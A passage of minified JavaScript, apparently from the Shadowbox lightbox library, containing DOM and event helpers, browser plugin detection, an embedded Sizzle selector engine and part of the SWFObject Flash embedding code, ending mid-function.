if(!Array.prototype.indexOf){Array.prototype.indexOf=function(obj,from){var len=this.length>>>0;from=from||0;if(from<0)
from+=len;for(;from<len;++from){if(from in this&&this[from]===obj)
return from;}
return-1;}}
function now(){return(new Date).getTime();}
function apply(original,extension){for(var property in extension)
original[property]=extension[property];return original;}
function each(obj,callback){var i=0,len=obj.length;for(var value=obj[0];i<len&&callback.call(value,i,value)!==false;value=obj[++i]){}}
function sprintf(str,replace){return str.replace(/\{(\w+?)\}/g,function(match,i){return replace[i];});}
function noop(){}
function get(id){return document.getElementById(id);}
function remove(el){el.parentNode.removeChild(el);}
var supportsOpacity=true,supportsFixed=true;function checkSupport(){var body=document.body,div=document.createElement("div");supportsOpacity=typeof div.style.opacity==="string";div.style.position="fixed";div.style.margin=0;div.style.top="20px";body.appendChild(div,body.firstChild);supportsFixed=div.offsetTop==20;body.removeChild(div);}
S.getStyle=(function(){var opacity=/opacity=([^)]*)/,getComputedStyle=document.defaultView&&document.defaultView.getComputedStyle;return function(el,style){var ret;if(!supportsOpacity&&style=="opacity"&&el.currentStyle){ret=opacity.test(el.currentStyle.filter||"")?(parseFloat(RegExp.$1)/100)+"":"";return ret===""?"1":ret;}
if(getComputedStyle){var computedStyle=getComputedStyle(el,null);if(computedStyle)
ret=computedStyle[style];if(style=="opacity"&&ret=="")
ret="1";}else{ret=el.currentStyle[style];}
return ret;}})();S.appendHTML=function(el,html){if(el.insertAdjacentHTML){el.insertAdjacentHTML("BeforeEnd",html);}else if(el.lastChild){var range=el.ownerDocument.createRange();range.setStartAfter(el.lastChild);var frag=range.createContextualFragment(html);el.appendChild(frag);}else{el.innerHTML=html;}}
S.getWindowSize=function(dimension){if(document.compatMode==="CSS1Compat")
return document.documentElement["client"+dimension];return document.body["client"+dimension];}
S.setOpacity=function(el,opacity){var style=el.style;if(supportsOpacity){style.opacity=(opacity==1?"":opacity);}else{style.zoom=1;if(opacity==1){if(typeof style.filter=="string"&&(/alpha/i).test(style.filter))
style.filter=style.filter.replace(/\s*[\w\.]*alpha\([^\)]*\);?/gi,"");}else{style.filter=(style.filter||"").replace(/\s*[\w\.]*alpha\([^\)]*\)/gi,"")+" alpha(opacity="+(opacity*100)+")";}}}
S.clearOpacity=function(el){S.setOpacity(el,1);}
function getTarget(e){var target=e.target?e.target:e.srcElement;return target.nodeType==3?target.parentNode:target;}
function getPageXY(e){var x=e.pageX||(e.clientX+(document.documentElement.scrollLeft||document.body.scrollLeft)),y=e.pageY||(e.clientY+(document.documentElement.scrollTop||document.body.scrollTop));return[x,y];}
function preventDefault(e){e.preventDefault();}
function keyCode(e){return e.which?e.which:e.keyCode;}
function addEvent(el,type,handler){if(el.addEventListener){el.addEventListener(type,handler,false);}else{if(el.nodeType===3||el.nodeType===8)
return;if(el.setInterval&&(el!==window&&!el.frameElement))
el=window;if(!handler.__guid)
handler.__guid=addEvent.guid++;if(!el.events)
el.events={};var handlers=el.events[type];if(!handlers){handlers=el.events[type]={};if(el["on"+type])
handlers[0]=el["on"+type];}
handlers[handler.__guid]=handler;el["on"+type]=addEvent.handleEvent;}}
addEvent.guid=1;addEvent.handleEvent=function(event){var result=true;event=event||addEvent.fixEvent(((this.ownerDocument||this.document||this).parentWindow||window).event);var handlers=this.events[event.type];for(var i in handlers){this.__handleEvent=handlers[i];if(this.__handleEvent(event)===false)
result=false;}
return result;}
addEvent.preventDefault=function(){this.returnValue=false;}
addEvent.stopPropagation=function(){this.cancelBubble=true;}
addEvent.fixEvent=function(e){e.preventDefault=addEvent.preventDefault;e.stopPropagation=addEvent.stopPropagation;return e;}
function removeEvent(el,type,handler){if(el.removeEventListener){el.removeEventListener(type,handler,false);}else{if(el.events&&el.events[type])
delete el.events[type][handler.__guid];}}
var loaded=false,DOMContentLoaded;if(document.addEventListener){DOMContentLoaded=function(){document.removeEventListener("DOMContentLoaded",DOMContentLoaded,false);S.load();}}else if(document.attachEvent){DOMContentLoaded=function(){if(document.readyState==="complete"){document.detachEvent("onreadystatechange",DOMContentLoaded);S.load();}}}
function doScrollCheck(){if(loaded)
return;try{document.documentElement.doScroll("left");}catch(e){setTimeout(doScrollCheck,1);return;}
S.load();}
function bindLoad(){if(document.readyState==="complete")
return S.load();if(document.addEventListener){document.addEventListener("DOMContentLoaded",DOMContentLoaded,false);window.addEventListener("load",S.load,false);}else if(document.attachEvent){document.attachEvent("onreadystatechange",DOMContentLoaded);window.attachEvent("onload",S.load);var topLevel=false;try{topLevel=window.frameElement===null;}catch(e){}
if(document.documentElement.doScroll&&topLevel)
doScrollCheck();}}
S.load=function(){if(loaded)
return;if(!document.body)
return setTimeout(S.load,13);loaded=true;checkSupport();S.onReady();if(!S.options.skipSetup)
S.setup();S.skin.init();}
S.plugins={};if(navigator.plugins&&navigator.plugins.length){var names=[];each(navigator.plugins,function(i,p){names.push(p.name);});names=names.join(',');var f4m=names.indexOf('Flip4Mac')>-1;S.plugins={fla:names.indexOf('Shockwave Flash')>-1,qt:names.indexOf('QuickTime')>-1,wmp:!f4m&&names.indexOf('Windows Media')>-1,f4m:f4m};}else{var detectPlugin=function(name){var axo;try{axo=new ActiveXObject(name);}catch(e){}
return!!axo;}
S.plugins={fla:detectPlugin('ShockwaveFlash.ShockwaveFlash'),qt:detectPlugin('QuickTime.QuickTime'),wmp:detectPlugin('wmplayer.ocx'),f4m:false};}
var relAttr=/^(light|shadow)box/i,expando="shadowboxCacheKey",cacheKey=1;S.cache={};S.select=function(selector){var links=[];if(!selector){var rel;each(document.getElementsByTagName("a"),function(i,el){rel=el.getAttribute("rel");if(rel&&relAttr.test(rel))
links.push(el);});}else{var length=selector.length;if(length){if(typeof selector=="string"){if(S.find)
links=S.find(selector);}else if(length==2&&typeof selector[0]=="string"&&selector[1].nodeType){if(S.find)
links=S.find(selector[0],selector[1]);}else{for(var i=0;i<length;++i)
links[i]=selector[i];}}else{links.push(selector);}}
return links;}
S.setup=function(selector,options){each(S.select(selector),function(i,link){S.addCache(link,options);});}
S.teardown=function(selector){each(S.select(selector),function(i,link){S.removeCache(link);});}
S.addCache=function(link,options){var key=link[expando];if(key==undefined){key=cacheKey++;link[expando]=key;addEvent(link,"click",handleClick);}
S.cache[key]=S.makeObject(link,options);}
S.removeCache=function(link){removeEvent(link,"click",handleClick);delete S.cache[link[expando]];link[expando]=null;}
S.getCache=function(link){var key=link[expando];return(key in S.cache&&S.cache[key]);}
S.clearCache=function(){for(var key in S.cache)
S.removeCache(S.cache[key].link);S.cache={};}
function handleClick(e){S.open(this);if(S.gallery.length)
preventDefault(e);}
S.find=(function(){var chunker=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,done=0,toString=Object.prototype.toString,hasDuplicate=false,baseHasDuplicate=true;[0,0].sort(function(){baseHasDuplicate=false;return 0;});var Sizzle=function(selector,context,results,seed){results=results||[];var origContext=context=context||document;if(context.nodeType!==1&&context.nodeType!==9){return[];}
if(!selector||typeof selector!=="string"){return results;}
var parts=[],m,set,checkSet,extra,prune=true,contextXML=isXML(context),soFar=selector;while((chunker.exec(""),m=chunker.exec(soFar))!==null){soFar=m[3];parts.push(m[1]);if(m[2]){extra=m[3];break;}}
if(parts.length>1&&origPOS.exec(selector)){if(parts.length===2&&Expr.relative[parts[0]]){set=posProcess(parts[0]+parts[1],context);}else{set=Expr.relative[parts[0]]?[context]:Sizzle(parts.shift(),context);while(parts.length){selector=parts.shift();if(Expr.relative[selector]){selector+=parts.shift();}
set=posProcess(selector,set);}}}else{if(!seed&&parts.length>1&&context.nodeType===9&&!contextXML&&Expr.match.ID.test(parts[0])&&!Expr.match.ID.test(parts[parts.length-1])){var ret=Sizzle.find(parts.shift(),context,contextXML);context=ret.expr?Sizzle.filter(ret.expr,ret.set)[0]:ret.set[0];}
if(context){var ret=seed?{expr:parts.pop(),set:makeArray(seed)}:Sizzle.find(parts.pop(),parts.length===1&&(parts[0]==="~"||parts[0]==="+")&&context.parentNode?context.parentNode:context,contextXML);set=ret.expr?Sizzle.filter(ret.expr,ret.set):ret.set;if(parts.length>0){checkSet=makeArray(set);}else{prune=false;}
while(parts.length){var cur=parts.pop(),pop=cur;if(!Expr.relative[cur]){cur="";}else{pop=parts.pop();}
if(pop==null){pop=context;}
Expr.relative[cur](checkSet,pop,contextXML);}}else{checkSet=parts=[];}}
if(!checkSet){checkSet=set;}
if(!checkSet){throw"Syntax error, unrecognized expression: "+(cur||selector);}
if(toString.call(checkSet)==="[object Array]"){if(!prune){results.push.apply(results,checkSet);}else if(context&&context.nodeType===1){for(var i=0;checkSet[i]!=null;i++){if(checkSet[i]&&(checkSet[i]===true||checkSet[i].nodeType===1&&contains(context,checkSet[i]))){results.push(set[i]);}}}else{for(var i=0;checkSet[i]!=null;i++){if(checkSet[i]&&checkSet[i].nodeType===1){results.push(set[i]);}}}}else{makeArray(checkSet,results);}
if(extra){Sizzle(extra,origContext,results,seed);Sizzle.uniqueSort(results);}
return results;};Sizzle.uniqueSort=function(results){if(sortOrder){hasDuplicate=baseHasDuplicate;results.sort(sortOrder);if(hasDuplicate){for(var i=1;i<results.length;i++){if(results[i]===results[i-1]){results.splice(i--,1);}}}}
return results;};Sizzle.matches=function(expr,set){return Sizzle(expr,null,null,set);};Sizzle.find=function(expr,context,isXML){var set,match;if(!expr){return[];}
for(var i=0,l=Expr.order.length;i<l;i++){var type=Expr.order[i],match;if((match=Expr.leftMatch[type].exec(expr))){var left=match[1];match.splice(1,1);if(left.substr(left.length-1)!=="\\"){match[1]=(match[1]||"").replace(/\\/g,"");set=Expr.find[type](match,context,isXML);if(set!=null){expr=expr.replace(Expr.match[type],"");break;}}}}
if(!set){set=context.getElementsByTagName("*");}
return{set:set,expr:expr};};Sizzle.filter=function(expr,set,inplace,not){var old=expr,result=[],curLoop=set,match,anyFound,isXMLFilter=set&&set[0]&&isXML(set[0]);while(expr&&set.length){for(var type in Expr.filter){if((match=Expr.match[type].exec(expr))!=null){var filter=Expr.filter[type],found,item;anyFound=false;if(curLoop===result){result=[];}
if(Expr.preFilter[type]){match=Expr.preFilter[type](match,curLoop,inplace,result,not,isXMLFilter);if(!match){anyFound=found=true;}else if(match===true){continue;}}
if(match){for(var i=0;(item=curLoop[i])!=null;i++){if(item){found=filter(item,match,i,curLoop);var pass=not^!!found;if(inplace&&found!=null){if(pass){anyFound=true;}else{curLoop[i]=false;}}else if(pass){result.push(item);anyFound=true;}}}}
if(found!==undefined){if(!inplace){curLoop=result;}
expr=expr.replace(Expr.match[type],"");if(!anyFound){return[];}
break;}}}
if(expr===old){if(anyFound==null){throw"Syntax error, unrecognized expression: "+expr;}else{break;}}
old=expr;}
return curLoop;};var Expr=Sizzle.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]*)((?:\([^\)]+\)|[^\2\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(elem){return elem.getAttribute("href");}},relative:{"+":function(checkSet,part){var isPartStr=typeof part==="string",isTag=isPartStr&&!/\W/.test(part),isPartStrNotTag=isPartStr&&!isTag;if(isTag){part=part.toLowerCase();}
for(var i=0,l=checkSet.length,elem;i<l;i++){if((elem=checkSet[i])){while((elem=elem.previousSibling)&&elem.nodeType!==1){}
checkSet[i]=isPartStrNotTag||elem&&elem.nodeName.toLowerCase()===part?elem||false:elem===part;}}
if(isPartStrNotTag){Sizzle.filter(part,checkSet,true);}},">":function(checkSet,part){var isPartStr=typeof part==="string";if(isPartStr&&!/\W/.test(part)){part=part.toLowerCase();for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){var parent=elem.parentNode;checkSet[i]=parent.nodeName.toLowerCase()===part?parent:false;}}}else{for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){checkSet[i]=isPartStr?elem.parentNode:elem.parentNode===part;}}
if(isPartStr){Sizzle.filter(part,checkSet,true);}}},"":function(checkSet,part,isXML){var doneName=done++,checkFn=dirCheck;if(typeof part==="string"&&!/\W/.test(part)){var nodeCheck=part=part.toLowerCase();checkFn=dirNodeCheck;}
checkFn("parentNode",part,doneName,checkSet,nodeCheck,isXML);},"~":function(checkSet,part,isXML){var doneName=done++,checkFn=dirCheck;if(typeof part==="string"&&!/\W/.test(part)){var nodeCheck=part=part.toLowerCase();checkFn=dirNodeCheck;}
checkFn("previousSibling",part,doneName,checkSet,nodeCheck,isXML);}},find:{ID:function(match,context,isXML){if(typeof context.getElementById!=="undefined"&&!isXML){var m=context.getElementById(match[1]);return m?[m]:[];}},NAME:function(match,context){if(typeof context.getElementsByName!=="undefined"){var ret=[],results=context.getElementsByName(match[1]);for(var i=0,l=results.length;i<l;i++){if(results[i].getAttribute("name")===match[1]){ret.push(results[i]);}}
return ret.length===0?null:ret;}},TAG:function(match,context){return context.getElementsByTagName(match[1]);}},preFilter:{CLASS:function(match,curLoop,inplace,result,not,isXML){match=" "+match[1].replace(/\\/g,"")+" ";if(isXML){return match;}
for(var i=0,elem;(elem=curLoop[i])!=null;i++){if(elem){if(not^(elem.className&&(" "+elem.className+" ").replace(/[\t\n]/g," ").indexOf(match)>=0)){if(!inplace){result.push(elem);}}else if(inplace){curLoop[i]=false;}}}
return false;},ID:function(match){return match[1].replace(/\\/g,"");},TAG:function(match,curLoop){return match[1].toLowerCase();},CHILD:function(match){if(match[1]==="nth"){var test=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(match[2]==="even"&&"2n"||match[2]==="odd"&&"2n+1"||!/\D/.test(match[2])&&"0n+"+match[2]||match[2]);match[2]=(test[1]+(test[2]||1))-0;match[3]=test[3]-0;}
match[0]=done++;return match;},ATTR:function(match,curLoop,inplace,result,not,isXML){var name=match[1].replace(/\\/g,"");if(!isXML&&Expr.attrMap[name]){match[1]=Expr.attrMap[name];}
if(match[2]==="~="){match[4]=" "+match[4]+" ";}
return match;},PSEUDO:function(match,curLoop,inplace,result,not){if(match[1]==="not"){if((chunker.exec(match[3])||"").length>1||/^\w/.test(match[3])){match[3]=Sizzle(match[3],null,null,curLoop);}else{var ret=Sizzle.filter(match[3],curLoop,inplace,true^not);if(!inplace){result.push.apply(result,ret);}
return false;}}else if(Expr.match.POS.test(match[0])||Expr.match.CHILD.test(match[0])){return true;}
return match;},POS:function(match){match.unshift(true);return match;}},filters:{enabled:function(elem){return elem.disabled===false&&elem.type!=="hidden";},disabled:function(elem){return elem.disabled===true;},checked:function(elem){return elem.checked===true;},selected:function(elem){elem.parentNode.selectedIndex;return elem.selected===true;},parent:function(elem){return!!elem.firstChild;},empty:function(elem){return!elem.firstChild;},has:function(elem,i,match){return!!Sizzle(match[3],elem).length;},header:function(elem){return/h\d/i.test(elem.nodeName);},text:function(elem){return"text"===elem.type;},radio:function(elem){return"radio"===elem.type;},checkbox:function(elem){return"checkbox"===elem.type;},file:function(elem){return"file"===elem.type;},password:function(elem){return"password"===elem.type;},submit:function(elem){return"submit"===elem.type;},image:function(elem){return"image"===elem.type;},reset:function(elem){return"reset"===elem.type;},button:function(elem){return"button"===elem.type||elem.nodeName.toLowerCase()==="button";},input:function(elem){return/input|select|textarea|button/i.test(elem.nodeName);}},setFilters:{first:function(elem,i){return i===0;},last:function(elem,i,match,array){return i===array.length-1;},even:function(elem,i){return i%2===0;},odd:function(elem,i){return i%2===1;},lt:function(elem,i,match){return i<match[3]-0;},gt:function(elem,i,match){return i>match[3]-0;},nth:function(elem,i,match){return match[3]-0===i;},eq:function(elem,i,match){return match[3]-0===i;}},filter:{PSEUDO:function(elem,match,i,array){var name=match[1],filter=Expr.filters[name];if(filter){return filter(elem,i,match,array);}else if(name==="contains"){return(elem.textContent||elem.innerText||getText([elem])||"").indexOf(match[3])>=0;}else if(name==="not"){var not=match[3];for(var i=0,l=not.length;i<l;i++){if(not[i]===elem){return false;}}
return true;}else{throw"Syntax error, unrecognized expression: "+name;}},CHILD:function(elem,match){var type=match[1],node=elem;switch(type){case'only':case'first':while((node=node.previousSibling)){if(node.nodeType===1){return false;}}
if(type==="first"){return true;}
node=elem;case'last':while((node=node.nextSibling)){if(node.nodeType===1){return false;}}
return true;case'nth':var first=match[2],last=match[3];if(first===1&&last===0){return true;}
var doneName=match[0],parent=elem.parentNode;if(parent&&(parent.sizcache!==doneName||!elem.nodeIndex)){var count=0;for(node=parent.firstChild;node;node=node.nextSibling){if(node.nodeType===1){node.nodeIndex=++count;}}
parent.sizcache=doneName;}
var diff=elem.nodeIndex-last;if(first===0){return diff===0;}else{return(diff%first===0&&diff/first>=0);}}},ID:function(elem,match){return elem.nodeType===1&&elem.getAttribute("id")===match;},TAG:function(elem,match){return(match==="*"&&elem.nodeType===1)||elem.nodeName.toLowerCase()===match;},CLASS:function(elem,match){return(" "+(elem.className||elem.getAttribute("class"))+" ").indexOf(match)>-1;},ATTR:function(elem,match){var name=match[1],result=Expr.attrHandle[name]?Expr.attrHandle[name](elem):elem[name]!=null?elem[name]:elem.getAttribute(name),value=result+"",type=match[2],check=match[4];return result==null?type==="!=":type==="="?value===check:type==="*="?value.indexOf(check)>=0:type==="~="?(" "+value+" ").indexOf(check)>=0:!check?value&&result!==false:type==="!="?value!==check:type==="^="?value.indexOf(check)===0:type==="$="?value.substr(value.length-check.length)===check:type==="|="?value===check||value.substr(0,check.length+1)===check+"-":false;},POS:function(elem,match,i,array){var name=match[2],filter=Expr.setFilters[name];if(filter){return filter(elem,i,match,array);}}}};var origPOS=Expr.match.POS;for(var type in Expr.match){Expr.match[type]=new RegExp(Expr.match[type].source+/(?![^\[]*\])(?![^\(]*\))/.source);Expr.leftMatch[type]=new RegExp(/(^(?:.|\r|\n)*?)/.source+Expr.match[type].source);}
var makeArray=function(array,results){array=Array.prototype.slice.call(array,0);if(results){results.push.apply(results,array);return results;}
return array;};try{Array.prototype.slice.call(document.documentElement.childNodes,0);}catch(e){makeArray=function(array,results){var ret=results||[];if(toString.call(array)==="[object Array]"){Array.prototype.push.apply(ret,array);}else{if(typeof array.length==="number"){for(var i=0,l=array.length;i<l;i++){ret.push(array[i]);}}else{for(var i=0;array[i];i++){ret.push(array[i]);}}}
return ret;};}
var sortOrder;if(document.documentElement.compareDocumentPosition){sortOrder=function(a,b){if(!a.compareDocumentPosition||!b.compareDocumentPosition){if(a==b){hasDuplicate=true;}
return a.compareDocumentPosition?-1:1;}
var ret=a.compareDocumentPosition(b)&4?-1:a===b?0:1;if(ret===0){hasDuplicate=true;}
return ret;};}else if("sourceIndex"in document.documentElement){sortOrder=function(a,b){if(!a.sourceIndex||!b.sourceIndex){if(a==b){hasDuplicate=true;}
return a.sourceIndex?-1:1;}
var ret=a.sourceIndex-b.sourceIndex;if(ret===0){hasDuplicate=true;}
return ret;};}else if(document.createRange){sortOrder=function(a,b){if(!a.ownerDocument||!b.ownerDocument){if(a==b){hasDuplicate=true;}
return a.ownerDocument?-1:1;}
var aRange=a.ownerDocument.createRange(),bRange=b.ownerDocument.createRange();aRange.setStart(a,0);aRange.setEnd(a,0);bRange.setStart(b,0);bRange.setEnd(b,0);var ret=aRange.compareBoundaryPoints(Range.START_TO_END,bRange);if(ret===0){hasDuplicate=true;}
return ret;};}
function getText(elems){var ret="",elem;for(var i=0;elems[i];i++){elem=elems[i];if(elem.nodeType===3||elem.nodeType===4){ret+=elem.nodeValue;}else if(elem.nodeType!==8){ret+=getText(elem.childNodes);}}
return ret;}
(function(){var form=document.createElement("div"),id="script"+(new Date).getTime();form.innerHTML="<a name='"+id+"'/>";var root=document.documentElement;root.insertBefore(form,root.firstChild);if(document.getElementById(id)){Expr.find.ID=function(match,context,isXML){if(typeof context.getElementById!=="undefined"&&!isXML){var m=context.getElementById(match[1]);return m?m.id===match[1]||typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id").nodeValue===match[1]?[m]:undefined:[];}};Expr.filter.ID=function(elem,match){var node=typeof elem.getAttributeNode!=="undefined"&&elem.getAttributeNode("id");return elem.nodeType===1&&node&&node.nodeValue===match;};}
root.removeChild(form);root=form=null;})();(function(){var div=document.createElement("div");div.appendChild(document.createComment(""));if(div.getElementsByTagName("*").length>0){Expr.find.TAG=function(match,context){var results=context.getElementsByTagName(match[1]);if(match[1]==="*"){var tmp=[];for(var i=0;results[i];i++){if(results[i].nodeType===1){tmp.push(results[i]);}}
results=tmp;}
return results;};}
div.innerHTML="<a href='#'></a>";if(div.firstChild&&typeof div.firstChild.getAttribute!=="undefined"&&div.firstChild.getAttribute("href")!=="#"){Expr.attrHandle.href=function(elem){return elem.getAttribute("href",2);};}
div=null;})();if(document.querySelectorAll){(function(){var oldSizzle=Sizzle,div=document.createElement("div");div.innerHTML="<p class='TEST'></p>";if(div.querySelectorAll&&div.querySelectorAll(".TEST").length===0){return;}
Sizzle=function(query,context,extra,seed){context=context||document;if(!seed&&context.nodeType===9&&!isXML(context)){try{return makeArray(context.querySelectorAll(query),extra);}catch(e){}}
return oldSizzle(query,context,extra,seed);};for(var prop in oldSizzle){Sizzle[prop]=oldSizzle[prop];}
div=null;})();}
(function(){var div=document.createElement("div");div.innerHTML="<div class='test e'></div><div class='test'></div>";if(!div.getElementsByClassName||div.getElementsByClassName("e").length===0){return;}
div.lastChild.className="e";if(div.getElementsByClassName("e").length===1){return;}
Expr.order.splice(1,0,"CLASS");Expr.find.CLASS=function(match,context,isXML){if(typeof context.getElementsByClassName!=="undefined"&&!isXML){return context.getElementsByClassName(match[1]);}};div=null;})();function dirNodeCheck(dir,cur,doneName,checkSet,nodeCheck,isXML){for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){elem=elem[dir];var match=false;while(elem){if(elem.sizcache===doneName){match=checkSet[elem.sizset];break;}
if(elem.nodeType===1&&!isXML){elem.sizcache=doneName;elem.sizset=i;}
if(elem.nodeName.toLowerCase()===cur){match=elem;break;}
elem=elem[dir];}
checkSet[i]=match;}}}
function dirCheck(dir,cur,doneName,checkSet,nodeCheck,isXML){for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){elem=elem[dir];var match=false;while(elem){if(elem.sizcache===doneName){match=checkSet[elem.sizset];break;}
if(elem.nodeType===1){if(!isXML){elem.sizcache=doneName;elem.sizset=i;}
if(typeof cur!=="string"){if(elem===cur){match=true;break;}}else if(Sizzle.filter(cur,[elem]).length>0){match=elem;break;}}
elem=elem[dir];}
checkSet[i]=match;}}}
var contains=document.compareDocumentPosition?function(a,b){return a.compareDocumentPosition(b)&16;}:function(a,b){return a!==b&&(a.contains?a.contains(b):true);};var isXML=function(elem){var documentElement=(elem?elem.ownerDocument||elem:0).documentElement;return documentElement?documentElement.nodeName!=="HTML":false;};var posProcess=function(selector,context){var tmpSet=[],later="",match,root=context.nodeType?[context]:context;while((match=Expr.match.PSEUDO.exec(selector))){later+=match[0];selector=selector.replace(Expr.match.PSEUDO,"");}
selector=Expr.relative[selector]?selector+"*":selector;for(var i=0,l=root.length;i<l;i++){Sizzle(selector,root[i],tmpSet);}
return Sizzle.filter(later,tmpSet);};return Sizzle;})();S.flash=(function(){var swfobject=function(){var UNDEF="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_INSTALL_ID="SWFObjectExprInst",win=window,doc=document,nav=navigator,domLoadFnArr=[],regObjArr=[],objIdArr=[],listenersArr=[],script,timer=null,storedAltContent=null,storedAltContentId=null,isDomLoaded=false,isExpressInstallActive=false;var ua=function(){var w3cdom=typeof doc.getElementById!=UNDEF&&typeof doc.getElementsByTagName!=UNDEF&&typeof doc.createElement!=UNDEF,playerVersion=[0,0,0],d=null;if(typeof nav.plugins!=UNDEF&&typeof nav.plugins[SHOCKWAVE_FLASH]==OBJECT){d=nav.plugins[SHOCKWAVE_FLASH].description;if(d&&!(typeof nav.mimeTypes!=UNDEF&&nav.mimeTypes[FLASH_MIME_TYPE]&&!nav.mimeTypes[FLASH_MIME_TYPE].enabledPlugin)){d=d.replace(/^.*\s+(\S+\s+\S+$)/,"$1");playerVersion[0]=parseInt(d.replace(/^(.*)\..*$/,"$1"),10);playerVersion[1]=parseInt(d.replace(/^.*\.(.*)\s.*$/,"$1"),10);playerVersion[2]=/r/.test(d)?parseInt(d.replace(/^.*r(.*)$/,"$1"),10):0;}}
else if(typeof win.ActiveXObject!=UNDEF){var a=null,fp6Crash=false;try{a=new ActiveXObject(SHOCKWAVE_FLASH_AX+".7");}
catch(e){try{a=new ActiveXObject(SHOCKWAVE_FLASH_AX+".6");playerVersion=[6,0,21];a.AllowScriptAccess="always";}
catch(e){if(playerVersion[0]==6){fp6Crash=true;}}
if(!fp6Crash){try{a=new ActiveXObject(SHOCKWAVE_FLASH_AX);}
catch(e){}}}
if(!fp6Crash&&a){try{d=a.GetVariable("$version");if(d){d=d.split(" ")[1].split(",");playerVersion=[parseInt(d[0],10),parseInt(d[1],10),parseInt(d[2],10)];}}
catch(e){}}}
var u=nav.userAgent.toLowerCase(),p=nav.platform.toLowerCase(),webkit=/webkit/.test(u)?parseFloat(u.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,ie=false,windows=p?/win/.test(p):/win/.test(u),mac=p?/mac/.test(p):/mac/.test(u);return{w3cdom:w3cdom,pv:playerVersion,webkit:webkit,ie:ie,win:windows,mac:mac};}();var onDomLoad=function(){if(!ua.w3cdom){return;}
addDomLoadEvent(main);if(ua.ie&&ua.win){try{doc.write("<scr"+"ipt id=__ie_ondomload defer=true src=//:></scr"+"ipt>");script=getElementById("__ie_ondomload");if(script){addListener(script,"onreadystatechange",checkReadyState);}}
catch(e){}}
if(ua.webkit&&typeof doc.readyState!=UNDEF){timer=setInterval(function(){if(/loaded|complete/.test(doc.readyState)){callDomLoadFunctions();}},10);}
if(typeof doc.addEventListener!=UNDEF){doc.addEventListener("DOMContentLoaded",callDomLoadFunctions,null);}
addLoadEvent(callDomLoadFunctions);}();function checkReadyState(){if(script.readyState=="complete"){script.parentNode.removeChild(script);callDomLoadFunctions();}}
function callDomLoadFunctions(){if(isDomLoaded){return;}
if(ua.ie&&ua.win){var s=createElement("span");try{var t=doc.getElementsByTagName("body")[0].appendChild(s);t.parentNode.removeChild(t);}
catch(e){return;}}
isDomLoaded=true;if(timer){clearInterval(timer);timer=null;}
var dl=domLoadFnArr.length;for(var i=0;i<dl;i++){domLoadFnArr[i]();}}
function addDomLoadEvent(fn){if(isDomLoaded){fn();}
else{domLoadFnArr[domLoadFnArr.length]=fn;}}
function addLoadEvent(fn){if(typeof win.addEventListener!=UNDEF){win.addEventListener("load",fn,false);}
else if(typeof doc.addEventListener!=UNDEF){doc.addEventListener("load",fn,false);}
else if(typeof win.attachEvent!=UNDEF){addListener(win,"onload",fn);}
else if(typeof win.onload=="function"){var fnOld=win.onload;win.onload=function(){fnOld();fn();};}
else{win.onload=fn;}}
function main(){var rl=regObjArr.length;for(var i=0;i<rl;i++){var id=regObjArr[i].id;if(ua.pv[0]>0){var obj=getElementById(id);if(obj){regObjArr[i].width=obj.getAttribute("width")?obj.getAttribute("width"):"0";regObjArr[i].height=obj.getAttribute("height")?obj.getAttribute("height"):"0";if(hasPlayerVersion(regObjArr[i].swfVersion)){if(ua.webkit&&ua.webkit<312){fixParams(obj);}
setVisibility(id,true);}
else if(regObjArr[i].expressInstall&&!isExpressInstallActive&&hasPlayerVersion("6.0.65")&&(ua.win||ua.mac)){showExpressInstall(regObjArr[i]);}
else{displayAltContent(obj);}}}
else{setVisibility(id,true);}}}
function fixParams(obj){var nestedObj=obj.getElementsByTagName(OBJECT)[0];if(nestedObj){var e=createElement("embed"),a=nestedObj.attributes;if(a){var al=a.length;for(var i=0;i<al;i++){if(a[i].nodeName=="DATA"){e.setAttribute("src",a[i].nodeValue);}
else{e.setAttribute(a[i].nodeName,a[i].nodeValue);}}}
var c=nestedObj.childNodes;if(c){var cl=c.length;for(var j=0;j<cl;j++){if(c[j].nodeType==1&&c[j].nodeName=="PARAM"){e.setAttribute(c[j].getAttribute("name"),c[j].getAttribute("value"));}}}
obj.parentNode.replaceChild(e,obj);}}
function showExpressInstall(regObj){isExpressInstallActive=true;var obj=getElementById(regObj.id);if(obj){if(regObj.altContentId){var ac=getElementById(regObj.altContentId);if(ac){storedAltContent=ac;storedAltContentId=regObj.altContentId;}}
else{storedAltContent=abstractAltContent(obj);}
if(!(/%$/.test(regObj.width))&&parseInt(regObj.width,10)<310){regObj.width="310";}
if(!(/%$/.test(regObj.height))&&parseInt(regObj.height,10)<137){regObj.height="137";}
